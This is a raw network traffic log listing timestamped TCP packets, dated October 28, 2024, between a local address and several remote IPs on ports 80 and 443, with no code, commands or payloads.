                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126713991 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126719952 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126729012 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126730919 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126754999 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126766920 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126943111 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.126998901 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127013922 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127017975 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127028942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127034903 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127046108 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127069950 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127085924 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127260923 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127275944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127305984 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127322912 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127326965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127334118 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127341032 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127353907 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127357006 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127367973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127372980 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127383947 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127388000 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127401114 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127403975 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127410889 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127418995 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127424955 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127435923 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127444983 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127460003 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127475023 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127955914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127971888 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.127985954 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.128017902 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.128031015 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.173266888 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.178772926 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.249356985 CET4434991813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.250180006 CET4434991813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.250241995 CET49918443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.250296116 CET49918443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.250296116 CET49918443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.250313044 CET4434991813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.250322104 CET4434991813.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.253173113 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.253205061 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.253269911 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.253417969 CET49922443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.253432989 CET4434992213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.299912930 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.299971104 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300024033 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300036907 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300051928 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300110102 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300329924 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300353050 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300359964 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300673008 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300754070 CET4434991320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.300931931 CET49913443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.358319998 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.358381033 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.358432055 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.358449936 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.358473063 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.358490944 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.359066010 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.359083891 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.359122038 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.359416962 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.359499931 CET4434991720.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.359989882 CET49917443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.398015022 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.398041964 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.398171902 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.398284912 CET49923443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.398304939 CET4434992320.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.410887003 CET4434992013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.411274910 CET49920443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.411294937 CET4434992013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.412117958 CET49920443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.412123919 CET4434992013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.415859938 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.415877104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.415896893 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.415977955 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416011095 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416026115 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416039944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416049004 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416074038 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416199923 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416214943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416229010 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416248083 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416268110 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416604042 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416755915 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416770935 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416806936 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416843891 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416943073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416958094 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416977882 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.416992903 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417001963 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417010069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417047977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417077065 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417270899 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417289019 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417318106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417349100 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417427063 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417440891 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417454958 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417469978 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417483091 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417521000 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417612076 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417627096 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417643070 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417653084 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417654037 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417658091 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417674065 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417689085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417722940 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417756081 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417969942 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417984962 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.417999029 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418015003 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418029070 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418030977 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418046951 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418061018 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418075085 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418076992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418086052 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418107986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418121099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418123960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418152094 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418180943 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418626070 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418648005 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418658018 CET49919443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418663979 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418682098 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418695927 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418751001 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418801069 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418816090 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418829918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418843031 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418845892 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418860912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418874025 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418874979 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418889046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418905973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418932915 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418946981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418970108 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418984890 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418987989 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.418998957 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419008970 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419013023 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419022083 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419028044 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419043064 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419059992 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419645071 CET49919443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419651031 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419763088 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419779062 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419792891 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419809103 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419819117 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419823885 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419838905 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419852972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419862032 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419867992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419882059 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419894934 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419905901 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419919014 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419919968 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419934988 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419940948 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419949055 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419964075 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.419994116 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.420030117 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.420063972 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.420082092 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.420094967 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.420106888 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.420137882 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.448738098 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.449219942 CET49921443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.449258089 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.449572086 CET49921443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.449580908 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.546574116 CET4434992013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.546725988 CET4434992013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.546806097 CET49920443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.547107935 CET49920443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.547127962 CET4434992013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.547141075 CET49920443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.547147989 CET4434992013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.552309036 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.552341938 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.552479982 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.552772045 CET49924443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.552788973 CET4434992413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554032087 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554064989 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554117918 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554174900 CET49919443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554255962 CET49919443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554267883 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554279089 CET49919443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.554284096 CET4434991913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.556554079 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.556582928 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.556653023 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.556813955 CET49925443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.556826115 CET4434992513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.592612028 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.592675924 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.592789888 CET49921443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.592803955 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.592871904 CET49921443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.592989922 CET49921443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.593007088 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.593019962 CET49921443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.593027115 CET4434992113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.596101999 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.596120119 CET4434992613.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.596189022 CET49926443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.596410036 CET49926443192.168.2.513.107.246.60
